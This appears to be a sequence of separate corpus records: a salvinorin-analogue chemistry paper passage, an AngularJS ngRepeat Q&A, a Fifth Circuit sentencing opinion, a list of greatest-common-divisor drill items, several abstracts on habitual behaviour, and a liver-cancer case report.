The same lactones were generated in trace quantities by the Heck reaction (**11** → **12**), possibly by a Pd--H-mediated pathway,^[@ref37]^ but never in preparatively useful yields, nor with stereoselectivity. Experimentation with radical-polar crossover cyclization^[@ref38]^ and Lewis acid-assisted cyclization homed in on Bi(OTf)~3~ in hexafluoroisopropanol (HFIP) solvent as the highest yielding conditions that exhibited good lactonization rate (61%, *t*~1/2~ = 30 min at 0 °C), but no stereoselectivity. We were surprised to find that HFIP solutions of **12** in the absence of any Lewis acids underwent lactonization, albeit with substantially decreased rates (*t*~1/2~ = 3.5 days at 40 °C). These were the only conditions to exhibit stereochemical preference for 20-nor-**1** (4:1 d.r. @ 63% conversion). Neither trifluoroethanol (TFE, p*K*~a~ = 12.4)^[@ref39]^ nor nonafluoro-*tert*-butanol (p*K*~a~ = 5.2) promoted efficient lactonization, even at elevated temperature (90 °C), highlighting the idiosyncrasy of HFIP (p*K*~a~ = 9.3). Weak and moderate Brønsted acids (CH~3~CO~2~H, p*K*~a~ = 4.8; phenol, p*K*~a~ = 10; CF~3~CO~2~H, p*K*~a~ = −0.25) did not cause any reaction at room temperature, whereas strong Brønsted acids (CF~3~SO~3~H, p*K*~a~ = −14) caused nonstereoselective lactonization concomitant with decomposition. The lactonization is reversible in HFIP: at elevated temperatures 20-nor-**1** equilibrates to **12** and 12-*epi*-20-nor-**1** with no stereoselectivity but favoring the lactones. Therefore, the stereoselectivity imparted by HFIP is not thermodynamic but kinetically determined. All of these observations exclude an intermolecular alkene protonation by HFIP; the selectivity may instead derive from acidification of the substrate carboxylic acid via a hydrogen bonding network, followed by internal protonation and collapse of the ion pair ([Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}B). For preparative purposes, we have found it easiest to generate 20-nor-**1** with high conversion from **12**, but with low stereoselectivity since 12-*epi*-20-nor-**1** is easily separable. Alternatively, we can halt these reactions at low conversion and good stereoselectivity (e.g., 63%, 4:1 d.r.), which may be useful for analogues whose diastereomers are inseparable. Access to 20-nor-**1** allowed us to compare its chemical reactivity and biological activity to **1**. As reported by multiple investigators, SalA undergoes epimerization under basic conditions to disfavor the natural configuration at C8. Similarly, we found 0.5 equiv of DBU in acetonitrile-*d*~3~ generates a 29:71 mixture of **1**:8-epi-**1** at 50 °C ([Figure [6](#fig6){ref-type="fig"}](#fig6){ref-type="fig"}A). In contrast, this relative stability is reversed in 20-nor-SalA: under identical conditions the equilibrium holds at 70:30, close to the calculated *K*~eq~ ([Figure [3](#fig3){ref-type="fig"}](#fig3){ref-type="fig"}). More importantly, 20-nor-SalA retains high affinity for the κ-OR, as measured by radioligand competition binding against \[^3^H\]-U69,593. It also behaves as a full agonist in G protein signaling assays measured by the inhibition of forskolin-stimulated, adenylyl cyclase-mediated, cAMP accumulation. The pharmacological properties of 20-nor-SalA closely match the conventional, selective agonist U69,593, although SalA has slightly higher affinity and efficacy than either ([Figure [6](#fig6){ref-type="fig"}](#fig6){ref-type="fig"}C).
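The equilibrium ratios and half-lives quoted above can be put on a common energy and rate scale with the standard relations ΔG = −RT ln K and k = ln 2/*t*~1/2~. The short script below is only an illustrative back-of-the-envelope check, not part of the original report, and the function names are ours; note that the two lactonization half-lives were measured at different temperatures, so their ratio is only a rough comparison.

```python
import math

R = 8.314  # gas constant, J/(mol*K)

def rel_free_energy(natural, epi, T):
    """Free energy of the natural configuration relative to its C8 epimer (kJ/mol),
    given the equilibrium ratio natural:epi at temperature T (K)."""
    return -R * T * math.log(natural / epi) / 1000.0

T = 323.15  # 50 degC, the DBU epimerization temperature
# SalA equilibrates to 29:71 (natural:8-epi); 20-nor-SalA to 70:30.
print(round(rel_free_energy(29, 71, T), 2))  # about +2.4 kJ/mol: natural SalA is uphill
print(round(rel_free_energy(70, 30, T), 2))  # about -2.3 kJ/mol: natural 20-nor-SalA is downhill

# Lactonization of 12 in HFIP: t1/2 = 30 min at 0 degC with Bi(OTf)3,
# versus t1/2 = 3.5 days at 40 degC with no Lewis acid.
k_bi   = math.log(2) / (30 * 60)          # s^-1
k_hfip = math.log(2) / (3.5 * 24 * 3600)  # s^-1
print(round(k_bi / k_hfip))               # roughly 170-fold faster, temperatures differing
```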
While we consider our chemical synthesis to be more useful for scaffold diversification than for large-scale production, its brevity has allowed us to prepare enough material (\>75 mg) to test its properties in vivo. κ-OR agonists suppress non-histamine-related itch in rodents and in humans, so we evaluated the ability of 20-nor-**1** to suppress itch in mice, and found it similarly effective to SalA and another conventional agonist (U50,488H) ([Figure [6](#fig6){ref-type="fig"}](#fig6){ref-type="fig"}B), indicating a functional equivalence. ![Comparison of chemical reactivity and biological activity of **1** and 20-nor-**1**. (A) Treatment of **1** and 20-nor-**1** with DBU in MeCN-*d*~3~ at 50 °C results in slow epimerization at C8. However, **1** favors 8-*epi*-**1** (equilibrium after 11 days), whereas 20-nor-**1** is more stable than its C8 epimer (equilibrium after 3 days). (B) *Kappa* agonists suppress chloroquine phosphate-induced pruritus in mice.^[@ref10],[@ref40]^ Chloroquine phosphate (CP 40 mg/kg, s.c.) was administered 10 min following a 3 mg/kg (s.c.) injection of each compound and scratching behaviors were monitored over time. All compounds suppressed the itch response at this dose over time compared to vehicle (1:1:8, DMSO:Tween 80:0.9% sterile saline) pretreatment (interaction of time and drug: *F*~(36, 273)~ = 19.87, *p* \< 0.0001, 2-way ANOVA; *n* = 10 veh, 5 U50, 5 20-nor-SalA, 5 SalA). (C) Affinity and functional signaling parameters at the human KOR expressed in CHO-K1 cells.^[@ref41],[@ref42]^ Radioligand competition binding assays were performed against ^3^H-U69,593 to determine *K*~*i*~ (*n* = 3--9). Competition binding with ^3^H-DAMGO and ^3^H-Diprenorphine was performed to determine affinity at μ-OR and δ-OR (*n* = 3). Inhibition of cAMP accumulation was used to determine EC~50~ and *E*~MAX~ values by nonlinear regression analysis (*n* = 6--8). Data are shown as the mean ± SEM. (D) Analogues synthesized from intermediate **11** using the same sequence as [Figure [5](#fig5){ref-type="fig"}](#fig5){ref-type="fig"}.](oc-2017-00488d_0005){#fig6} Preliminary proof-of-principle for the generality of this route, especially the late stage carboxylate-accelerated Heck reaction and alkene lactonization, was established by the synthesis of aryl analogues that have been inaccessible by semisynthetic modification of isolated **1** ([Figure [6](#fig6){ref-type="fig"}](#fig6){ref-type="fig"}D). For example, a thiophene has never been substituted for the naturally occurring furan, as in **13**, which exhibits high binding affinity but reduced agonism compared to 20-nor-**1**. Similarly, purely unsubstituted phenyl analogues of 20-nor-**1** (**14**) retain the same binding affinity as their furyl counterparts, even the C12-epimer of **14**. This observation stands in contrast to prior analogues formed by cycloaddition of dimethylacetylene dicarboxylate with **1**, whose disubstituted phenyl rings led to 31--39-fold losses in binding affinity.^[@ref43]^ None of our analogues show appreciable binding to the alternative μ- or δ-opioid receptors (μ-OR/δ-OR), maintaining the high receptor selectivity of **1**.
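The EC~50~ and *E*~MAX~ values in Figure 6C are described as coming from nonlinear regression of cAMP-inhibition data. Purely as an illustration of that fitting step (the actual data, software, and model used by the authors are not given in the text), a minimal four-parameter logistic fit with SciPy might look like the sketch below; the concentrations and responses are invented placeholders, not measurements.

```python
import numpy as np
from scipy.optimize import curve_fit

def logistic4(logc, bottom, top, log_ec50, hill):
    """Four-parameter logistic (Hill) curve on a log10-concentration axis."""
    return bottom + (top - bottom) / (1.0 + 10.0 ** ((log_ec50 - logc) * hill))

# Placeholder concentration-response data: log10[agonist, M] vs % inhibition of cAMP.
log_conc = np.array([-11.0, -10.0, -9.0, -8.0, -7.0, -6.0, -5.0])
response = np.array([2.0, 9.0, 31.0, 64.0, 88.0, 96.0, 99.0])

popt, _ = curve_fit(logistic4, log_conc, response, p0=[0.0, 100.0, -8.0, 1.0])
bottom, top, log_ec50, hill = popt
print("EC50 = %.2g M, EMAX = %.0f%%" % (10.0 ** log_ec50, top))
```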
Thus, a small handful of analogues has already opened opportunities for scaffold alteration, and this information should aid the design of analogues with modified physical properties.^[@ref44]^ As demonstrated here, the integration of structure perturbation, *in silico* docking, and retrosynthetic analysis can advance the use of complex secondary metabolites (natural products) as drug leads ([Figure [7](#fig7){ref-type="fig"}](#fig7){ref-type="fig"}, visualized using the Rubik's Cube analogy, as in ref ([@ref45])). The attributes of secondary metabolites have been embraced as useful library characteristics, especially high-fraction sp^3^ content, improving selectivity and hit rate.^[@ref46]−[@ref48]^ These same attributes can lead to arduous synthesis campaigns and have prompted scaffold redesign to significantly reduce complexity.^[@ref49]^ While structural complexity and synthetic complexity are related, they are nonidentical: synthesis can be simplified while structural complexity is maintained.^[@ref49],[@ref50]^ We hope to apply the approach demonstrated manually here---computed affinity/dynamic retrosynthetic analysis---to minimally perturb complexity^[@ref51]^ and affinity, only enough to reveal the most efficient retrosynthetic path. A docking program coupled to traditional retrosynthesis search algorithms^[@ref23],[@ref45]^ might easily be deployed against complex metabolites with known targets. Although restricted to a single illustration, this approach has proved successful for the salvinorin chemotype of κ-OR agonist. By deletion of a single methyl group (C20), identified here as the primary driving force for C8 epimerization, we have simultaneously stabilized the salvinorin scaffold and simplified its synthesis, while maintaining target engagement.^[@ref52]^ This chemical platform includes a carboxylate-directed Heck reaction and an unusual fluorous alcohol-promoted lactonization, which are capable of generating previously inaccessible analogues that retain high potency at the κ-OR and high selectivity against other opioid receptors. Additional modification of the 20-nor-SalA scaffold will focus on improvement of half-life in blood, bioavailability, peripheral nervous system restriction, and bias against βarrestin recruitment, as well as further scaffold stabilization. Success in these goals should deliver multiple candidates for next generation analgesics. ![Workflow for computed affinity dynamic retrosynthesis. Iterative computation could accelerate deployment of complex metabolites as drug leads. First, random structural mutation of a complex scaffold would generate an ensemble of equally complex analogues. Second, *in silico* docking using a validated computational model would screen out poor binders and generate an enriched ensemble. Third, retrosynthesis search algorithms would identify scaffolds from among this enriched ensemble that maintain the high structural complexity of the natural product (secondary metabolite), but possess reduced synthetic complexity. 
A medicinal chemistry campaign would thus be accelerated by facile total synthesis, accelerating optimization of properties.](oc-2017-00488d_0006){#fig7} The Supporting Information is available free of charge on the [ACS Publications website](http://pubs.acs.org) at DOI: [10.1021/acscentsci.7b00488](http://pubs.acs.org/doi/abs/10.1021/acscentsci.7b00488).NMR spectra, X-ray crystallographic data ([PDF](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_001.pdf))Protein docking structures ([PDB1](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_002.pdb), [PDB2](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_003.pdb))Crystallographic data for **10** and 20-nor-**1** are available free of charge from the Cambridge Crystallographic Data Centre (CCDC) under reference numbers 1569390 and 1569389 ([CIF1](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_004.cif), [CIF2](http://pubs.acs.org/doi/suppl/10.1021/acscentsci.7b00488/suppl_file/oc7b00488_si_005.cif)) Supplementary Material ====================== ###### oc7b00488_si_001.pdf ###### oc7b00488_si_002.pdb ###### oc7b00488_si_003.pdb ###### oc7b00488_si_004.cif ###### oc7b00488_si_005.cif ^\#^ Graduate School of Pharmaceutical Sciences, Tohoku University, 6-3 Aoba, Aramaki, Aoba-ku, Sendai 980-8578, Japan. J.J.R. and Y.S. designed and performed synthetic experiments, and analyzed the corresponding data, with R.A.S. assisting. C.L.S. designed and performed biological assays, and analyzed the corresponding data. S.Z. and V.K. designed and performed docking experiments and analyzed the corresponding data. R.C.S., L.M.B., and R.A.S. supervised the project. R.A.S. wrote the manuscript. The authors declare the following competing financial interest(s): A chemical process patent has been filed on the synthetic route, U.S. Patent Appl. 62,519,363. We thank Keary Engle for helpful conversations, Min Cho for technical support, and Arnold Rheingold, Curtis Moore, and Milan Gembicky for X-ray crystallographic analysis. Financial support for this work was provided by the NIH (GM104180, GM105766, DA031927) and Tohoku University. Additional support was provided by Eli Lilly, Novartis, Bristol-Meyers Squibb, Amgen, Boehringer-Ingelheim, the Sloan Foundation, and the Baxter Foundation.
null
minipile
NaturalLanguage
mit
null
Q: ng:repeat dupes. Getting duplicate data in ng-repeat

Hey so I have a problem in my angular app in regard to dup data. I have identified the problem down to an exact ng-repeat but I can't see what is wrong with it. I am getting an error saying I have duplicate data but I can't see how it happening because I have only 4 items in my database currently. I have tried different things like renaming and such but to me it looks right so I'm a little stumped as to why I am getting the error. I am thinking maybe the data is being loaded twice but not sure how? Anyways I will post the relevant code and if some angular god out there can point me on my way I'd be forever grateful.

The error message is:

    angular.min.js:84 Error: [ngRepeat:dupes] http://errors.angularjs.org/1.2.9/ngRepeat/dupes?p0=task%20in%20tasks%20track%20by%20task.id%20%7C%20filter%20%3A%20filterTask&p1=undefined

JavaScript:

    app.controller('tasksController', function ($scope, $http) {
        getTask(); // Load all available tasks

        function getTask() {
            $http.post('ajax/getTask.php').success(function (data) {
                $scope.tasks = data;
            });
        }

        $scope.addTask = function (task) {
            $http.post('ajax/addTask.php?task=' + task).success(function (data) {
                getTask();
                $scope.taskInput = '';
            });
        };

        $scope.deleteTask = function (task) {
            if (confirm('Are you sure to delete this line?')) {
                $http.post('ajax/deleteTask.php?taskID=' + task).success(function (data) {
                    getTask();
                });
            }
        };

        $scope.toggleStatus = function (item, status, task) {
            if (status == '2') {
                status = '0';
            } else {
                status = '2';
            }
            $http.post('ajax/updateTask.php?taskID=' + item + '&status=' + status).success(function (data) {
                getTask();
            });
        };
    });

Html:

    <div class="task">
        <label class="checkbox" ng-repeat="task in tasks track by task.id | filter : filterTask">
            <input type="checkbox" value="{{task.STATUS}}" ng-checked="task.STATUS==2" ng-click="toggleStatus(task.ID,task.STATUS, task.TASK)"/>
            <span ng-class="{strike:task.STATUS==2}">{{task.TASK}} [{{task.ID}}]</span>
            <a ng-click="deleteTask(task.ID)" class="pull-right"><i class="glyphicon glyphicon-trash"></i></a>
        </label>
    </div>

A: As the link in the error message suggests, you can work around the issue using track by:

    <div ng-repeat="value in [4, 4] track by $index"></div>
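A likely root cause in this specific snippet, judging only from what is posted: the error URL ends with p1=undefined, and the rest of the markup reads the fields in upper case ({{task.ID}}, {{task.STATUS}}), so the track by expression task.id is probably undefined for every row, and all rows then collide on the same key. AngularJS also requires track by to be the last part of the ng-repeat expression, so the filter has to come before it. Assuming the getTask.php response really does use an upper-case ID field (that key name is inferred from the bindings, not confirmed), something like this should avoid the dupes error:

    <label class="checkbox" ng-repeat="task in tasks | filter : filterTask track by task.ID">

If the JSON actually uses a different key, track by that key instead, or fall back to track by $index as in the answer above.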
null
minipile
NaturalLanguage
mit
null
United States Court of Appeals Fifth Circuit F I L E D IN THE UNITED STATES COURT OF APPEALS FOR THE FIFTH CIRCUIT June 25, 2003 Charles R. Fulbruge III Clerk No. 02-51057 Conference Calendar UNITED STATES OF AMERICA, Plaintiff-Appellee, versus JUAN ZUNIGA-GUEVARA, Defendant-Appellant. -------------------- Appeal from the United States District Court for the Western District of Texas USDC No. A-02-CR-165-ALL-SS -------------------- Before DeMOSS, DENNIS, and PRADO, Circuit Judges. PER CURIAM:* Juan Zuniga-Guevara appeals the sentence imposed following his guilty plea conviction of being found in the United States after deportation/removal in violation of 8 U.S.C. § 1326. Zuniga contends that 8 U.S.C. § 1326(b) is unconstitutional. He argues that the prior conviction that resulted in his increased sentence is an element of a separate offense under 8 U.S.C. § 1326(b) that should have been alleged in his indictment. Zuniga maintains that he pleaded guilty to an indictment which * Pursuant to 5TH CIR. R. 47.5, the court has determined that this opinion should not be published and is not precedent except under the limited circumstances set forth in 5TH CIR. R. 47.5.4. No. 02-51057 -2- charged only simple reentry under 8 U.S.C. § 1326(a). He argues that his sentence exceeds the maximum term of imprisonment and supervised release which may be imposed for that offense. In Almendarez-Torres v. United States, 523 U.S. 224, 235 (1998), the Supreme Court held that the enhanced penalties in 8 U.S.C. § 1326(b) are sentencing provisions, not elements of separate offenses. The Court further held that the sentencing provisions do not violate the Due Process Clause. Id. at 239-47. Zuniga acknowledges that his arguments are foreclosed by Almendarez-Torres, but asserts that the decision has been cast into doubt by Apprendi v. New Jersey, 530 U.S. 466, 490 (2000). He seeks to preserve his arguments for further review. Apprendi did not overrule Almendarez-Torres. See Apprendi, 530 U.S. at 489-90; United States v. Dabeit, 231 F.3d 979, 984 (5th Cir. 2000). This court must follow Almendarez-Torres “unless and until the Supreme Court itself determines to overrule it.” Dabeit, 231 F.3d at 984 (internal quotation marks and citation omitted). The judgment of the district court is AFFIRMED. The Government has moved for a summary affirmance in lieu of filing an appellee’s brief. In its motion, the Government asks that an appellee’s brief not be required. The motion is GRANTED. AFFIRMED; MOTION GRANTED.
null
minipile
NaturalLanguage
mit
null
1 and 81? 27 What is the highest common factor of 382 and 455153? 191 Calculate the highest common divisor of 714150 and 300. 150 What is the highest common divisor of 175 and 19880? 35 What is the highest common divisor of 75257 and 273? 91 Calculate the highest common divisor of 5 and 79625. 5 Calculate the greatest common divisor of 18 and 53202. 6 What is the greatest common factor of 1049 and 1190615? 1049 What is the greatest common divisor of 2592 and 5751? 81 Calculate the greatest common divisor of 166 and 94786. 166 Calculate the greatest common divisor of 90 and 11934. 18 Calculate the highest common divisor of 259 and 16095. 37 Calculate the greatest common divisor of 12294009 and 17. 17 What is the greatest common factor of 10 and 372895? 5 Calculate the greatest common divisor of 446266 and 2. 2 What is the highest common factor of 279464 and 193? 193 What is the greatest common factor of 6912 and 1032? 24 Calculate the greatest common factor of 456 and 36898. 38 Calculate the highest common divisor of 387 and 19909. 43 Calculate the greatest common divisor of 89628 and 396. 132 What is the greatest common divisor of 1751 and 34? 17 Calculate the greatest common factor of 414201 and 707. 101 Calculate the greatest common factor of 14611 and 874. 19 Calculate the highest common divisor of 110 and 1792230. 110 Calculate the highest common divisor of 59 and 104194. 59 Calculate the greatest common factor of 2299 and 12388. 19 Calculate the highest common divisor of 166451 and 943. 23 What is the highest common factor of 231 and 12397? 77 Calculate the highest common divisor of 2187 and 26325. 81 Calculate the highest common factor of 8967 and 7991. 61 Calculate the greatest common factor of 1720 and 401749. 43 What is the highest common divisor of 396 and 6018804? 396 Calculate the highest common divisor of 107510 and 1. 1 Calculate the greatest common divisor of 117 and 100071. 9 What is the greatest common factor of 80984 and 26712? 424 Calculate the greatest common divisor of 342426 and 168. 42 Calculate the highest common divisor of 249813 and 1107. 369 Calculate the highest common factor of 142795 and 45. 5 What is the highest common divisor of 1327553 and 283? 283 What is the greatest common factor of 942378 and 102? 102 What is the highest common factor of 2266 and 76838? 206 What is the greatest common divisor of 689828 and 2528? 316 What is the greatest common divisor of 15813 and 1911? 21 Calculate the highest common factor of 37 and 356791. 37 What is the highest common factor of 614862 and 90? 18 What is the greatest common divisor of 1047 and 69? 3 Calculate the greatest common factor of 240416 and 64. 32 Calculate the greatest common divisor of 506 and 50446. 22 Calculate the highest common divisor of 2094887 and 279. 31 Calculate the greatest common divisor of 4606 and 65268. 98 What is the highest common divisor of 48289 and 43? 43 What is the greatest common divisor of 14820 and 2899? 13 Calculate the greatest common divisor of 24434 and 13503. 643 What is the greatest common divisor of 3710 and 1166? 106 What is the greatest common divisor of 2400 and 21850? 50 Calculate the highest common divisor of 18 and 55554. 6 Calculate the highest common divisor of 239834 and 1036. 518 Calculate the highest common divisor of 1107 and 701961. 123 Calculate the highest common factor of 17806 and 2. 2 Calculate the greatest common factor of 86052 and 20604. 1212 Calculate the greatest common factor of 840 and 61656. 168 What is the greatest common divisor of 18921 and 35? 
7 What is the greatest common factor of 69240 and 100? 20 What is the greatest common divisor of 1 and 136309? 1 Calculate the highest common divisor of 870 and 331905. 435 Calculate the highest common divisor of 4380 and 540. 60 Calculate the highest common factor of 506 and 3278. 22 Calculate the highest common divisor of 183 and 617869. 61 What is the highest common divisor of 52650 and 95550? 1950 What is the greatest common divisor of 1157530 and 2618? 374 Calculate the greatest common divisor of 20940 and 2016. 12 Calculate the greatest common factor of 128 and 35408. 16 What is the highest common divisor of 85936 and 287? 41 Calculate the greatest common factor of 17371 and 42529. 599 Calculate the greatest common divisor of 55044 and 891. 99 Calculate the greatest common factor of 60 and 2681300. 20 What is the highest common divisor of 36982 and 198? 22 What is the highest common factor of 6 and 2249? 1 Calculate the greatest common divisor of 1078921 and 106. 53 What is the highest common divisor of 6312 and 40? 8 Calculate the highest common factor of 7 and 16667. 7 Calculate the greatest common factor of 100685 and 109979. 1549 Calculate the greatest common factor of 148 and 1972396. 148 What is the greatest common factor of 8920 and 280? 40 What is the greatest common divisor of 76121 and 5542? 163 What is the highest common divisor of 16075 and 75? 25 What is the highest common factor of 216 and 854136? 72 Calculate the highest common divisor of 18 and 57618. 18 What is the highest common divisor of 1625 and 4250? 125 What is the greatest common factor of 18225846 and 18? 18 What is the highest common divisor of 1243 and 14553? 11 What is the highest common divisor of 114466 and 726? 242 What is the greatest common factor of 46305 and 270? 135 What is the highest common factor of 174 and 726? 6 What is the greatest common factor of 310 and 961? 31 Calculate the highest common divisor of 480 and 2718960. 240 Calculate the highest common divisor of 4704 and 2254. 98 What is the highest common factor of 18435 and 45? 15 Calculate the greatest common factor of 572 and 391534. 286 Calculate the highest common factor of 406827 and 867. 51 What is the highest common factor of 116 and 6076? 4 Calculate the greatest common divisor of 600 and 5352. 24 What is the greatest common factor of 616469 and 2737? 161 Calculate the highest common divisor of 8077 and 7298. 41 What is the greatest common factor of 4541 and 4009? 19 What is the highest common factor of 1968 and 48? 48 What is the greatest common divisor of 79200 and 32? 32 What is the greatest common divisor of 152 and 32? 8 Calculate the highest common divisor of 5735 and 34780. 185 Calculate the greatest common factor of 21560 and 49. 49 Calculate the greatest common factor of 880 and 1370. 10 Calculate the highest common divisor of 13090 and 384230. 770 What is the greatest common divisor of 460 and 1115? 5 Calculate the highest common factor of 306 and 17544. 102 Calculate the greatest common factor of 376160 and 320. 160 Calculate the greatest common factor of 177183 and 171. 9 What is the greatest common divisor of 15579 and 18? 9 Calculate the highest common divisor of 453045 and 10. 5 What is the greatest common divisor of 47745 and 180? 45 What is the greatest common factor of 482 and 70131? 241 Calculate the greatest common factor of 210133 and 2310. 77 Calculate the highest common factor of 50 and 1635375. 25 What is the greatest common divisor of 11080 and 16? 8 What is the greatest common divisor of 1129700 and 316? 
316 Calculate the highest common divisor of 1249308 and 36. 36 What is the greatest common divisor of 17 and 25568? 17 What is the greatest common divisor of 10591 and 105? 7 What is the greatest common divisor of 306943 and 182? 91 What is the greatest common factor of 75558 and 28? 14 Calculate the highest common factor of 9102 and 18942. 246 Calculate the highest common divisor of 1126840 and 880. 440 What is the highest common factor of 440 and 31700? 20 What is the greatest common divisor of 23048 and 8600? 344 What is the greatest common divisor of 648 and 12072? 24 Calculate the greatest common factor of 882 and 2625. 21 What is the greatest common factor of 121510 and 10894? 838 What is the greatest common divisor of 18904 and 153? 17 What is the highest common divisor of 630 and 419265? 315 Calculate the greatest common factor of 131593 and 525. 7 What is the highest common divisor of 9776 and 77584? 208 What is the highest common factor of 423612 and 819? 63 What is the highest common factor of 9456 and 2352? 48 Calculate the greatest common factor of 4074203 an
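These question-answer pairs can be checked by hand with the Euclidean algorithm: repeatedly replace the larger number by the remainder of dividing it by the smaller one until the remainder is zero. As a worked example, using the pair 714150 and 300 listed above (whose given answer is 150):

$$\gcd(714150, 300):\qquad 714150 = 2380 \times 300 + 150, \qquad 300 = 2 \times 150 + 0,$$

so the last nonzero remainder, 150, is the greatest common divisor, matching the answer given.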
null
minipile
NaturalLanguage
mit
null
Behavioral evidence suggests that instrumental conditioning is governed by two forms of action control: a goal-directed and a habit learning process. Model-based reinforcement learning (RL) has been argued to underlie the goal-directed process; however, the way in which it interacts with habits and the structure of the habitual process has remained unclear. According to a flat architecture, the habitual process corresponds to model-free RL, and its interaction with the goal-directed process is coordinated by an external arbitration mechanism. Alternatively, the interaction between these systems has recently been argued to be hierarchical, such that the formation of action sequences underlies habit learning and a goal-directed process selects between goal-directed actions and habitual sequences of actions to reach the goal. Here we used... BACKGROUND: Accelerometry is rapidly becoming the instrument of choice for measuring physical activity in children. However, as limited data exist on the minimum number of days accelerometry required to provide a reliable estimate of habitual physical activity, we aimed to quantify the number of days of recording required to estimate both habitual physical activity and habitual sedentary behavior in primary school children. METHODS: We measured physical activity and sedentary behavior over 7 days in 291 6- to 8-year-olds using Actigraph accelerometers. Between-day intraclass reliability coefficients were calculated and averaged across all combinations of days. RESULTS: Although reliability increased with time, 3 days of recording provided reliabilities for volume of activity, moderate-vigorous intensity activity, and sedentary behavior... Habitual dislocation of the patella (HDP) is a common presentation in pediatric age unlike adults. Many surgical procedures using proximal realignment and distal realignment have been reported to treat HDP in children with satisfactory results. However, late presentation of habitual patellar dislocation with osteoarthritis is rare and treatment plan has not yet been established. We present a case of neglected iatrogenic habitual patellar dislocation with osteoarthritis in a 50-year-old woman. Two-staged procedure was planned, first with patellar realignment and later with definitive total knee arthroplasty. Quadricepsplasty, medial patello-femoral ligament reconstruction, lateral release and tibial tuberosity transfer was done as primary procedure and total knee arthroplasty, which was planned as secondary procedure, was deferred as th... Shifting between goal-directed and habitual actions allows for efficient and flexible decision-making. Here we demonstrate a novel, within-subject instrumental lever-pressing paradigm where mice shift between goal-directed and habitual actions. We identify a role for orbitofrontal cortex (OFC) in actions following outcome-revaluation, and confirm that dorsal medial (DMS) and lateral striatum (DLS) mediate different action strategies. In-vivo simultaneous recordings of OFC, DMS, and DLS neuronal ensembles during shifting reveal that the same neurons display different activity depending on whether presses are goal-directed or habitual, with DMS and OFC becoming more—and DLS less-engaged during goal-directed actions. Importantly, the magnitude of neural activity changes in OFC following changes in outcome value positively correlates with ... Progressive loss of the ascending dopaminergic projection in the basal ganglia is a fundamental pathological feature of Parkinson's disease. 
Studies in animals and humans have identified spatially segregated functional territories in the basal ganglia for the control of goal-directed and habitual actions. In patients with Parkinson's disease the loss of dopamine is predominantly in the posterior putamen, a region of the basal ganglia associated with the control of habitual behaviour. These patients may therefore be forced into a progressive reliance on the goal-directed mode of action control that is mediated by comparatively preserved processing in the rostromedial striatum. Thus, many of their behavioural difficulties may reflect a loss of normal automatic control owing to distorting output signals from habitual control circuits, whi... Twelve healthy, fully-dentate subjects participated in experiments which included the continuous recording of surface electromyography and jaw movement during habitual and deliberate right-sided or left-sided chewing of a coherent bolus. Analogue data streams were converted to digital values. Root-mean-square (r.m.s.) muscle-activity traces were computed from raw electromyographic data. The working side was defined as the side from which the mandible approached the position of occlusal stoppage when in the most cranially directed part of the chewing cycle. In any given muscle, greater mean peak r.m.s. activities were found with ipsilateral than contralateral bolus replacement (p < 0.01, s); such differences were more pronounced for the masseter than the anterior temporal muscles. During habitual chewing, mean peak r.m.s. activities ... In the present research the effectiveness of implementation intentions suppressing a habitual snacking response was investigated. Based on the literature on processing of negations and on thought suppression, it was expected that implementation intentions with an ‘if (situation), then not (habitual response)’ structure would, ironically, reinforce the habit one is trying to break. Using lexical decision tasks, it was shown that forming suppression implementation intentions results in (a) a heightened cognitive ‘situation- snack’ association, compared to an intention only control group (Studies 1 and 2) or compared to forming an implementation intention specifying the substitution of the habitual response with a new response (Study 3), and (b) a higher frequency and amount of eating unhealthy snacks (Study 3). Furthermore, Study 4 showe... Previous studies have demonstrated that sleep duration is closely associated with metabolic risk factors. However, the relationship between habitual sleep duration and blood pressure values in Japanese population has not been fully established. We performed a cross-sectional study of 1,670 Japanese male subjects to clarify the relationship between habitual sleep duration and blood pressure values. The study subjects were divided into four groups (< 6, 6-, 7-, and ≥8 h) according to their nightly habitual sleep duration. The rate of subjects with < 6, 6-, 7-, and ≥8 h sleep duration was 12.0, 37.6, 38.2, and 12.2 %, respectively. Compared with the group with 7-h sleep duration (referent), the < 6 and ≥8 h groups had significantly greater systolic and diastolic blood pr... Chronic alcohol misuse is an intractable problem for contemporary medicine. This paper explores some of the origins of this intractability, by examining the formulation of medical and moral models of habitual drunkenness during the nineteenth century.
Its objective is to sketch out an historical perspective for contemporary problems in disentangling the relationship between culpability and susceptibility in alcohol dependence.
null
minipile
NaturalLanguage
mit
null
Effect of CD133-positive stem cells in repeated recurrence of hepatocellular carcinoma after liver transplantation: a case report. Liver transplantation (LT) is currently one of the best available strategies for treating multiple hepatocellular carcinoma (HCC) and decompensated liver cirrhosis. However, patients often undergo HCC recurrence after LT, with most HCC recurrences detected at 1-2 years. CD133 was the first identified member of the prominin family of pentaspan membrane proteins and is a marker of hepatic stem cells. Here, we report a unique case of seven repeated recurrences of HCC in the lungs after LT, with all HCC recurrences resected curatively by a thoracoscopic approach. Pathological examination revealed moderately differentiated HCC identical to that in the original histology of the liver tumor. Interestingly, no CD133 immunoreactivity was observed in cancerous lesions of the primary HCC and the 1st to 2nd recurrences, as indicated by immunohistochemistry. However, CD133 was strongly stained in the cancerous lesions from the 3rd to 7th recurrences. The patient survived and had no recurrence after 9 years of the initial living donor LT. In conclusion, we investigated an evocative case of seven repeated recurrences of HCC in the lungs to elucidate the significance of circulating CD133-positive hepatic stem cells. This case illustrates the need for further research to clarify the mutual effect of CD133-positive hepatic stem cells for the development of new therapeutic strategies.
null
minipile
NaturalLanguage
mit
null
